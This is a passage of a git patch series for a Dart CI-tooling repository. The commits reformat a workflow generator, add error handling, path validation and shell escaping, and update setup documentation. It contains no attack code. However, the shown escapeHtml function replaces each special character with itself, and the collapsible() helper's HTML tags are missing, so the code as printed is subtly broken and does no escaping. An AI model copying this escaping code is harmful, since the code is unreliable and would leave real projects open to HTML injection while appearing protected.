'x64', - runner: 'runtime-windows-2025-x64-256gb-64core', - ), - 'windows-x64': _PlatformDefinition( - osFamily: 'windows', - arch: 'x64', - runner: 'runtime-windows-2025-x64-256gb-64core', - ), + 'windows': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), + 'windows-x64': _PlatformDefinition(osFamily: 'windows', arch: 'x64', runner: 'runtime-windows-2025-x64-256gb-64core'), 'windows-arm64': _PlatformDefinition( osFamily: 'windows', arch: 'arm64', @@ -106,9 +74,7 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); /// Returns the web_test config map if present and valid; otherwise null. - static Map? _getWebTestConfig( - Map ciConfig, - ) { + static Map? _getWebTestConfig(Map ciConfig) { final raw = ciConfig['web_test']; return raw is Map ? raw : null; } @@ -130,9 +96,7 @@ class WorkflowGenerator { final ci = config['ci']; if (ci == null) return null; if (ci is! Map) { - throw StateError( - 'Expected "ci" in $configPath to be an object, got ${ci.runtimeType}', - ); + throw StateError('Expected "ci" in $configPath to be an object, got ${ci.runtimeType}'); } return ci; } @@ -146,14 +110,10 @@ class WorkflowGenerator { String render({String? existingContent}) { final errors = validate(ciConfig); if (errors.isNotEmpty) { - throw StateError( - 'Cannot render with invalid config:\n ${errors.join('\n ')}', - ); + throw StateError('Cannot render with invalid config:\n ${errors.join('\n ')}'); } - final skeletonPath = TemplateResolver.resolveTemplatePath( - 'github/workflows/ci.skeleton.yaml', - ); + final skeletonPath = TemplateResolver.resolveTemplatePath('github/workflows/ci.skeleton.yaml'); final skeletonFile = File(skeletonPath); if (!skeletonFile.existsSync()) { throw StateError('CI skeleton template not found at $skeletonPath'); @@ -176,19 +136,14 @@ class WorkflowGenerator { Map _buildContext() { final features = ciConfig['features'] as Map? ?? {}; final secretsRaw = ciConfig['secrets']; - final secrets = secretsRaw is Map - ? secretsRaw - : {}; + final secrets = secretsRaw is Map ? secretsRaw : {}; final subPackages = ciConfig['sub_packages'] as List? ?? []; // Build secrets list for env block (skip non-string values) final secretsList = >[]; for (final entry in secrets.entries) { if (entry.value is String) { - secretsList.add({ - 'env_name': entry.key, - 'secret_name': entry.value as String, - }); + secretsList.add({'env_name': entry.key, 'secret_name': entry.value as String}); } } @@ -204,9 +159,7 @@ class WorkflowGenerator { final isMultiPlatform = platforms.length > 1; final runnerOverridesRaw = ciConfig['runner_overrides']; - final runnerOverrides = runnerOverridesRaw is Map - ? runnerOverridesRaw - : {}; + final runnerOverrides = runnerOverridesRaw is Map ? runnerOverridesRaw : {}; String resolveRunner(String platformId) { final override = runnerOverrides[platformId]; if (override is String && override.trim().isNotEmpty) { @@ -231,8 +184,7 @@ class WorkflowGenerator { 'tooling_version': toolingVersion, 'dart_sdk': ciConfig['dart_sdk'] ?? '3.9.2', 'line_length': '${ciConfig['line_length'] ?? 120}', - 'pat_secret': - ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', + 'pat_secret': ciConfig['personal_access_token_secret'] as String? ?? 'GITHUB_TOKEN', // Feature flags 'proto': features['proto'] == true, @@ -245,14 +197,9 @@ class WorkflowGenerator { 'web_test': features['web_test'] == true, // Web test config (only computed when web_test is true) - 'web_test_concurrency': features['web_test'] == true - ? _resolveWebTestConcurrency(ciConfig) - : '1', - 'web_test_paths': features['web_test'] == true - ? _resolveWebTestPaths(ciConfig) - : '', - 'web_test_has_paths': - features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), + 'web_test_concurrency': features['web_test'] == true ? _resolveWebTestConcurrency(ciConfig) : '1', + 'web_test_paths': features['web_test'] == true ? _resolveWebTestPaths(ciConfig) : '', + 'web_test_has_paths': features['web_test'] == true && _resolveWebTestHasPaths(ciConfig), // Secrets / env 'has_secrets': secretsList.isNotEmpty, @@ -290,11 +237,7 @@ class WorkflowGenerator { if (webTestConfig != null) { final paths = webTestConfig['paths']; if (paths is List && paths.isNotEmpty) { - return paths - .whereType() - .where((s) => s.trim().isNotEmpty) - .map((s) => p.posix.normalize(s)) - .toList(); + return paths.whereType().where((s) => s.trim().isNotEmpty).map((s) => p.posix.normalize(s)).toList(); } } return const []; @@ -328,10 +271,7 @@ class WorkflowGenerator { existing = existing.replaceAll('\r\n', '\n'); rendered = rendered.replaceAll('\r\n', '\n'); - final sectionPattern = RegExp( - r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', - dotAll: true, - ); + final sectionPattern = RegExp(r'# --- BEGIN USER: (\S+) ---\n(.*?)# --- END USER: \1 ---', dotAll: true); // Extract user content from existing file final userSections = {}; @@ -349,10 +289,8 @@ class WorkflowGenerator { // Replace empty user sections in rendered output with preserved content var result = rendered; for (final entry in userSections.entries) { - final emptyPattern = - '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; - final replacement = - '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; + final emptyPattern = '# --- BEGIN USER: ${entry.key} ---\n# --- END USER: ${entry.key} ---'; + final replacement = '# --- BEGIN USER: ${entry.key} ---\n${entry.value}# --- END USER: ${entry.key} ---'; result = result.replaceFirst(emptyPattern, replacement); } @@ -377,15 +315,10 @@ class WorkflowGenerator { errors.add('ci.dart_sdk must not contain newlines/tabs'); } else { // dart-lang/setup-dart accepts semver versions or channels like stable/beta/dev. - final isChannel = - trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; - final isSemver = RegExp( - r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$', - ).hasMatch(trimmed); + final isChannel = trimmed == 'stable' || trimmed == 'beta' || trimmed == 'dev'; + final isSemver = RegExp(r'^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$').hasMatch(trimmed); if (!isChannel && !isSemver) { - errors.add( - 'ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"', - ); + errors.add('ci.dart_sdk must be a Dart SDK channel (stable|beta|dev) or a version like 3.9.2, got "$sdk"'); } } } @@ -399,18 +332,14 @@ class WorkflowGenerator { final key = entry.key; final value = entry.value; if (key is! String) { - errors.add( - 'ci.features keys must be strings, got ${key.runtimeType}', - ); + errors.add('ci.features keys must be strings, got ${key.runtimeType}'); continue; } if (!_knownFeatureKeys.contains(key)) { errors.add('ci.features contains unknown key "$key" (typo?)'); } if (value is! bool) { - errors.add( - 'ci.features["$key"] must be a bool, got ${value.runtimeType}', - ); + errors.add('ci.features["$key"] must be a bool, got ${value.runtimeType}'); } } } @@ -424,16 +353,12 @@ class WorkflowGenerator { } final lineLength = ciConfig['line_length']; if (lineLength != null && lineLength is! int && lineLength is! String) { - errors.add( - 'ci.line_length must be a number or string, got ${lineLength.runtimeType}', - ); + errors.add('ci.line_length must be a number or string, got ${lineLength.runtimeType}'); } final platforms = ciConfig['platforms']; if (platforms != null) { if (platforms is! List) { - errors.add( - 'ci.platforms must be an array, got ${platforms.runtimeType}', - ); + errors.add('ci.platforms must be an array, got ${platforms.runtimeType}'); } else { for (final p in platforms) { if (p is! String || !_platformDefinitions.containsKey(p)) { @@ -451,17 +376,13 @@ class WorkflowGenerator { final subPackages = ciConfig['sub_packages']; if (subPackages != null) { if (subPackages is! List) { - errors.add( - 'ci.sub_packages must be an array, got ${subPackages.runtimeType}', - ); + errors.add('ci.sub_packages must be an array, got ${subPackages.runtimeType}'); } else { final seenNames = {}; final seenPaths = {}; for (final sp in subPackages) { if (sp is! Map) { - errors.add( - 'ci.sub_packages entries must be objects, got ${sp.runtimeType}', - ); + errors.add('ci.sub_packages entries must be objects, got ${sp.runtimeType}'); continue; } final name = sp['name']; @@ -482,28 +403,20 @@ class WorkflowGenerator { continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs', - ); + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not contain newlines/tabs'); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path', - ); + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must be a relative repo path'); continue; } if (pathValue.contains('\\')) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)', - ); + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must use forward slashes (/)'); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add( - 'ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo', - ); + errors.add('ci.sub_packages["${name is String ? name : '?'}"].path must not traverse outside the repo'); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { @@ -522,9 +435,7 @@ class WorkflowGenerator { final runnerOverrides = ciConfig['runner_overrides']; if (runnerOverrides != null) { if (runnerOverrides is! Map) { - errors.add( - 'ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}', - ); + errors.add('ci.runner_overrides must be an object, got ${runnerOverrides.runtimeType}'); } else { for (final entry in runnerOverrides.entries) { final key = entry.key; @@ -537,9 +448,7 @@ class WorkflowGenerator { continue; } if (value is! String || value.trim().isEmpty) { - errors.add( - 'ci.runner_overrides["$key"] must be a non-empty string', - ); + errors.add('ci.runner_overrides["$key"] must be a non-empty string'); } } } @@ -548,9 +457,7 @@ class WorkflowGenerator { final webTestConfig = ciConfig['web_test']; if (webTestConfig != null) { if (webTestConfig is! Map) { - errors.add( - 'ci.web_test must be an object, got ${webTestConfig.runtimeType}', - ); + errors.add('ci.web_test must be an object, got ${webTestConfig.runtimeType}'); } else { // Detect unknown keys inside web_test config for (final key in webTestConfig.keys) { @@ -562,22 +469,16 @@ class WorkflowGenerator { final concurrency = webTestConfig['concurrency']; if (concurrency != null) { if (concurrency is! int) { - errors.add( - 'ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}', - ); + errors.add('ci.web_test.concurrency must be an integer, got ${concurrency.runtimeType}'); } else if (concurrency < 1 || concurrency > 32) { - errors.add( - 'ci.web_test.concurrency must be between 1 and 32, got $concurrency', - ); + errors.add('ci.web_test.concurrency must be between 1 and 32, got $concurrency'); } } final paths = webTestConfig['paths']; if (paths != null) { if (paths is! List) { - errors.add( - 'ci.web_test.paths must be an array, got ${paths.runtimeType}', - ); + errors.add('ci.web_test.paths must be an array, got ${paths.runtimeType}'); } else { final seenPaths = {}; for (var i = 0; i < paths.length; i++) { @@ -587,46 +488,32 @@ class WorkflowGenerator { continue; } if (pathValue != pathValue.trim()) { - errors.add( - 'ci.web_test.paths[$i] must not have leading/trailing whitespace', - ); + errors.add('ci.web_test.paths[$i] must not have leading/trailing whitespace'); continue; } if (pathValue.contains(RegExp(r'[\r\n\t]'))) { - errors.add( - 'ci.web_test.paths[$i] must not contain newlines/tabs', - ); + errors.add('ci.web_test.paths[$i] must not contain newlines/tabs'); continue; } if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { - errors.add( - 'ci.web_test.paths[$i] must be a relative repo path', - ); + errors.add('ci.web_test.paths[$i] must be a relative repo path'); continue; } if (pathValue.contains('\\')) { - errors.add( - 'ci.web_test.paths[$i] must use forward slashes (/)', - ); + errors.add('ci.web_test.paths[$i] must use forward slashes (/)'); continue; } final normalized = p.posix.normalize(pathValue); if (normalized.startsWith('..') || normalized.contains('/../')) { - errors.add( - 'ci.web_test.paths[$i] must not traverse outside the repo', - ); + errors.add('ci.web_test.paths[$i] must not traverse outside the repo'); continue; } if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { - errors.add( - 'ci.web_test.paths[$i] contains unsupported characters: "$pathValue"', - ); + errors.add('ci.web_test.paths[$i] contains unsupported characters: "$pathValue"'); continue; } if (!seenPaths.add(normalized)) { - errors.add( - 'ci.web_test.paths contains duplicate path "$normalized"', - ); + errors.add('ci.web_test.paths contains duplicate path "$normalized"'); } } } @@ -640,9 +527,7 @@ class WorkflowGenerator { if (features is Map) { final webTestEnabled = features['web_test'] == true; if (!webTestEnabled && webTestConfig is Map && webTestConfig.isNotEmpty) { - errors.add( - 'ci.web_test config is present but ci.features.web_test is not enabled (dead config?)', - ); + errors.add('ci.web_test config is present but ci.features.web_test is not enabled (dead config?)'); } } @@ -661,10 +546,7 @@ class WorkflowGenerator { Logger.info(' PAT secret: ${ciConfig['personal_access_token_secret']}'); Logger.info(' Platforms: ${platforms.join(', ')}'); - final enabledFeatures = features.entries - .where((e) => e.value == true) - .map((e) => e.key) - .toList(); + final enabledFeatures = features.entries.where((e) => e.value == true).map((e) => e.key).toList(); if (enabledFeatures.isNotEmpty) { Logger.info(' Features: ${enabledFeatures.join(', ')}'); } else { @@ -673,16 +555,10 @@ class WorkflowGenerator { if (features['web_test'] == true) { final wtConfig = ciConfig['web_test']; - final wtMap = wtConfig is Map - ? wtConfig - : {}; - final concurrency = wtMap['concurrency'] is int - ? wtMap['concurrency'] - : 1; + final wtMap = wtConfig is Map ? wtConfig : {}; + final concurrency = wtMap['concurrency'] is int ? wtMap['concurrency'] : 1; final webPaths = wtMap['paths'] is List ? wtMap['paths'] as List : []; - Logger.info( - ' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}', - ); + Logger.info(' Web test: concurrency=$concurrency, paths=${webPaths.isEmpty ? "(all)" : webPaths.join(", ")}'); } if (secrets.isNotEmpty) { From fe79ee43c72d5f75b4ef19c7fa20fa78fdf52be8 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 19:59:36 -0500 Subject: [PATCH 06/16] =?UTF-8?q?fix:=20address=20PR=20review=20findings?= =?UTF-8?q?=20=E2=80=94=20size=20guard,=20stream=20cleanup,=20path=20safet?= =?UTF-8?q?y,=20PLATFORM=5FID?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Add cumulative 1 MiB size guard to StepSummary.write() to prevent exceeding GitHub step summary limit - Store stream subscriptions separately and cancel on timeout to prevent resource leaks in TestCommand and _runTest() - Guard logDir creation and log file writes with FileSystemException catch blocks for robustness - Use package:path (p.join) for all path construction in TestCommand for cross-platform safety - Add single-quote escaping to StepSummary.escapeHtml() - HTML-escape collapsible() title parameter - Add PLATFORM_ID env var to multi-platform CI template from matrix.platform_id for meaningful test summary headings - Use $TEST_LOG_DIR consistently in CI template run blocks instead of hardcoded $RUNNER_TEMP/test-logs Co-Authored-By: Claude Opus 4.6 --- .github/workflows/ci.yaml | 5 ++- .runtime_ci/template_versions.json | 8 ++-- lib/src/cli/commands/test_command.dart | 48 +++++++++++++-------- lib/src/cli/manage_cicd.dart | 33 +++++++++----- lib/src/cli/utils/step_summary.dart | 23 ++++++++-- templates/github/workflows/ci.skeleton.yaml | 9 ++-- 6 files changed, 85 insertions(+), 41 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 40038b3..ac6ba13 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -190,11 +190,12 @@ jobs: shell: bash run: | set -o pipefail - mkdir -p "$RUNNER_TEMP/test-logs" - dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + mkdir -p "$TEST_LOG_DIR" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs + PLATFORM_ID: ${{ matrix.platform_id }} - name: Upload test logs if: always() diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 4dd8bfe..cb02ab0 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-24T22:08:51.110199Z", + "updated_at": "2026-02-25T00:56:25.768561Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,9 +23,9 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "65637b8a60124f7837b7c7b755ef718312054cac6307cf4cb3d646eccac02e6e", - "consumer_hash": "2b0dc631e68ad35000c358bb982f06a9ef5f7a9988581dcf994095ad47fd524d", - "updated_at": "2026-02-24T22:08:51.111054Z" + "hash": "de1765ea0dff5801a219ba046d25e890155e2ef3cbaa817563125926891aecae", + "consumer_hash": "7e82ac3ccf2e0b584b0797809862cc5c694e5a36923fd78c8565c8bb558eec7b", + "updated_at": "2026-02-25T00:56:25.769334Z" }, "workflow_release": { "hash": "326627cf41fdeb6cd61dae2fda98599d5815a34e63e4a8af1aaa8f7ad18435d3", diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 4103fe7..cbef56a 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -3,6 +3,7 @@ import 'dart:convert'; import 'dart:io'; import 'package:args/command_runner.dart'; +import 'package:path/path.dart' as p; import '../../triage/utils/config.dart'; import '../utils/logger.dart'; @@ -43,15 +44,20 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; - Directory(logDir).createSync(recursive: true); + final logDir = Platform.environment['TEST_LOG_DIR'] ?? p.join(repoRoot, '.dart_tool', 'test-logs'); + try { + Directory(logDir).createSync(recursive: true); + } on FileSystemException catch (e) { + Logger.error('Cannot create log directory $logDir: $e'); + exit(1); + } Logger.info('Log directory: $logDir'); - final jsonPath = '$logDir/results.json'; - final expandedPath = '$logDir/expanded.txt'; + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); // Skip gracefully if no test/ directory exists - final testDir = Directory('$repoRoot/test'); + final testDir = Directory(p.join(repoRoot, 'test')); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); StepSummary.write('## Test Results\n\n**No test/ directory found — skipped.**\n'); @@ -80,15 +86,17 @@ class TestCommand extends Command { final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { + final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { stdout.write(data); stdoutBuf.write(data); - }).asFuture(); - - final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { + }); + final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { stderr.write(data); stderrBuf.write(data); - }).asFuture(); + }); + + final stdoutDone = stdoutSub.asFuture(); + final stderrDone = stderrSub.asFuture(); // Process-level timeout: kill the test process if it exceeds 45 minutes. final exitCode = await process.exitCode.timeout( @@ -103,13 +111,19 @@ class TestCommand extends Command { try { await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { - // Ignore stream errors (e.g. process killed before streams drained) + // Process killed or streams timed out — cancel subscriptions to avoid leaks + await stdoutSub.cancel(); + await stderrSub.cancel(); } // Write console output to log files - File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { - File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + try { + File(p.join(logDir, 'dart_stdout.log')).writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File(p.join(logDir, 'dart_stderr.log')).writeAsStringSync(stderrBuf.toString()); + } + } on FileSystemException catch (e) { + Logger.warn('Could not write log files: $e'); } // Parse the JSON results file for structured test data @@ -133,7 +147,7 @@ class TestCommand extends Command { for (final sp in subPackages) { final name = sp['name'] as String; final path = sp['path'] as String; - final dir = '$repoRoot/$path'; + final dir = p.join(repoRoot, path); Logger.header('Testing sub-package: $name ($path)'); @@ -142,14 +156,14 @@ class TestCommand extends Command { continue; } - if (!File('$dir/pubspec.yaml').existsSync()) { + if (!File(p.join(dir, 'pubspec.yaml')).existsSync()) { Logger.error(' No pubspec.yaml in $dir — cannot test'); failures.add(name); continue; } // Skip sub-packages with no test/ directory - final spTestDir = Directory('$dir/test'); + final spTestDir = Directory(p.join(dir, 'test')); if (!spTestDir.existsSync()) { Logger.info(' No test/ directory in $name — skipping'); continue; diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 2dd1ade..5534b67 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2165,7 +2165,12 @@ Future _runTest(String repoRoot) async { // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; - Directory(logDir).createSync(recursive: true); + try { + Directory(logDir).createSync(recursive: true); + } on FileSystemException catch (e) { + _error('Cannot create log directory $logDir: $e'); + exit(1); + } final jsonPath = '$logDir/results.json'; final expandedPath = '$logDir/expanded.txt'; @@ -2195,15 +2200,17 @@ Future _runTest(String repoRoot) async { final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { + final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { stdout.write(data); stdoutBuf.write(data); - }).asFuture(); - - final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { + }); + final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { stderr.write(data); stderrBuf.write(data); - }).asFuture(); + }); + + final stdoutDone = stdoutSub.asFuture(); + final stderrDone = stderrSub.asFuture(); // Wait for process to exit (45-min safety timeout) const processTimeout = Duration(minutes: 45); @@ -2218,16 +2225,22 @@ Future _runTest(String repoRoot) async { try { await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { - // Ignore stream errors (e.g. process killed before streams drained) + // Process killed or streams timed out — cancel subscriptions to avoid leaks + await stdoutSub.cancel(); + await stderrSub.cancel(); } // Parse the JSON results file for structured test data final results = StepSummary.parseTestResultsJson(jsonPath); // Write console output to log file as well (supplements shell-level tee) - File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { - File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + try { + File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + } + } on FileSystemException catch (e) { + _warn('Could not write log files: $e'); } // Generate and write the rich job summary diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 8af587f..0208207 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -33,13 +33,22 @@ class TestResults { /// Step summary utilities for GitHub Actions. abstract final class StepSummary { + /// Maximum safe size for $GITHUB_STEP_SUMMARY (1 MiB minus 4 KiB buffer). + static const int _maxSummaryBytes = (1024 * 1024) - (4 * 1024); + /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). + /// Skips appending if the file would exceed the 1 MiB GitHub limit. static void write(String markdown) { final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile != null) { - File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); + if (summaryFile == null) return; + final file = File(summaryFile); + final currentSize = file.existsSync() ? file.lengthSync() : 0; + if (currentSize + markdown.length > _maxSummaryBytes) { + Logger.warn('Step summary approaching 1 MiB limit — skipping append'); + return; } + file.writeAsStringSync(markdown, mode: FileMode.append); } /// Build a link to the current workflow run's artifacts page. @@ -78,12 +87,18 @@ abstract final class StepSummary { static String collapsible(String title, String content, {bool open = false}) { if (content.trim().isEmpty) return ''; final openAttr = open ? ' open' : ''; - return '\n\n$title\n\n$content\n\n
\n'; + final safeTitle = escapeHtml(title); + return '\n\n$safeTitle\n\n$content\n\n\n'; } /// Escape HTML special characters for safe embedding in GitHub markdown. static String escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); + return input + .replaceAll('&', '&') + .replaceAll('<', '<') + .replaceAll('>', '>') + .replaceAll('"', '"') + .replaceAll("'", '''); } /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. diff --git a/templates/github/workflows/ci.skeleton.yaml b/templates/github/workflows/ci.skeleton.yaml index 52640f1..da67d3e 100644 --- a/templates/github/workflows/ci.skeleton.yaml +++ b/templates/github/workflows/ci.skeleton.yaml @@ -199,8 +199,8 @@ jobs: shell: bash run: | set -o pipefail - mkdir -p "$RUNNER_TEMP/test-logs" - dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + mkdir -p "$TEST_LOG_DIR" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs @@ -414,11 +414,12 @@ jobs: shell: bash run: | set -o pipefail - mkdir -p "$RUNNER_TEMP/test-logs" - dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$RUNNER_TEMP/test-logs/console.log" + mkdir -p "$TEST_LOG_DIR" + dart run runtime_ci_tooling:manage_cicd test 2>&1 | tee "$TEST_LOG_DIR/console.log" exit ${PIPESTATUS[0]} env: TEST_LOG_DIR: ${{ runner.temp }}/test-logs + PLATFORM_ID: ${{ matrix.platform_id }} - name: Upload test logs if: always() From 7e14b705ec19862584eca57f98f40f3c4cdf5386 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 20:44:14 -0500 Subject: [PATCH 07/16] sec: harden input validation, shell escaping, and symlink protection - Add _isSafeSecretIdentifier, _isSafeRunnerLabel, _isSafeSubPackageName validators for all Mustache-interpolated values - Validate secrets keys/values, pat_secret, line_length (numeric 1-10000), sub_packages name, and runner_overrides values - Reject hyphen-prefix and repo-root paths for sub_packages and web_test - Pin browser-actions/setup-chrome to SHA (v2.1.1) - Add -- end-of-options before web_test paths in skeleton - Shell-escape all interpolated values in manage_cicd.dart - Add RepoUtils: resolveTestLogDir, isSymlinkPath, ensureSafeDirectory, writeFileSafely for TEST_LOG_DIR safety - Wire WorkflowGenerator.validate() into validate command - Extract TestResultsUtil from StepSummary, add escapeHtml - Fix templates/config.json cross-validation (empty web_test: {}) - Add proto setup to web-test job, guard artifact upload with hashFiles - Add cli_utils_test.dart, expand workflow_generator_test.dart (214 tests) - Document path validation rules and cross-validation in SETUP.md Co-Authored-By: Claude Opus 4.6 --- SETUP.md | 35 +- docs/cli/API_REFERENCE.md | 4 + lib/src/cli/commands/test_command.dart | 21 +- lib/src/cli/commands/validate_command.dart | 24 ++ lib/src/cli/manage_cicd.dart | 181 +++------ lib/src/cli/utils/repo_utils.dart | 61 +++ lib/src/cli/utils/step_summary.dart | 245 +----------- lib/src/cli/utils/test_results_util.dart | 265 +++++++++++++ lib/src/cli/utils/workflow_generator.dart | 101 ++++- lib/src/triage/utils/config.dart | 9 + templates/config.json | 16 +- templates/github/workflows/ci.skeleton.yaml | 18 +- test/cli_utils_test.dart | 404 ++++++++++++++++++++ test/workflow_generator_test.dart | 394 ++++++++++++++++++- 14 files changed, 1380 insertions(+), 398 deletions(-) create mode 100644 lib/src/cli/utils/test_results_util.dart create mode 100644 test/cli_utils_test.dart diff --git a/SETUP.md b/SETUP.md index c011602..963d153 100644 --- a/SETUP.md +++ b/SETUP.md @@ -312,10 +312,10 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `features.analysis_cache` | bool | `false` | Cache analysis results across runs | | `features.managed_analyze` | bool | `false` | Run `dart analyze` via tooling | | `features.managed_test` | bool | `false` | Run `dart test` via tooling | -| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test | +| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test. In multi-platform mode this runs once in `analyze` and once per matrix `test` job. | | `features.web_test` | bool | `false` | Add a standalone `web-test` job that runs `dart test -p chrome` on Ubuntu | | `web_test.concurrency` | int | `1` | Number of concurrent browser test suites (1–32) | -| `web_test.paths` | list | `[]` | Specific test paths to run (empty = run all tests via `dart test -p chrome`) | +| `web_test.paths` | list | `[]` | Specific test paths to run (empty = run all tests via `dart test -p chrome`). Paths are strictly validated (rules below). | | `platforms` | list | `["ubuntu"]` | Platform matrix. If 2+ entries, CI runs `analyze` once then `test` as a matrix. Valid: `ubuntu-x64`, `ubuntu-arm64`, `macos-arm64`, `macos-x64`, `windows-x64`, `windows-arm64` (plus aliases `ubuntu`, `macos`, `windows`). | | `runner_overrides` | object | `{}` | Override platform IDs to custom `runs-on` labels (e.g. org-managed GitHub-hosted runners). Example: `{ "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core" }` | | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | @@ -323,6 +323,15 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio When `features.web_test` is `true`, the `web_test` object is optional; if omitted, defaults are used (`concurrency: 1`, `paths: []`). +`web_test.paths` validation rules: +- Entries must be non-empty strings with no leading/trailing whitespace. +- Paths must be relative (no absolute paths, no `~`, no traversal like `..`). +- Paths must use forward slashes (`/`) and only `[A-Za-z0-9_./-]` characters. +- `.` (repo root), duplicates (after normalization), and leading `-` are rejected. + +Cross-validation rule: +- If `features.web_test` is `false`, omit `web_test` or set it to `{}`. Non-empty `web_test` config with the feature 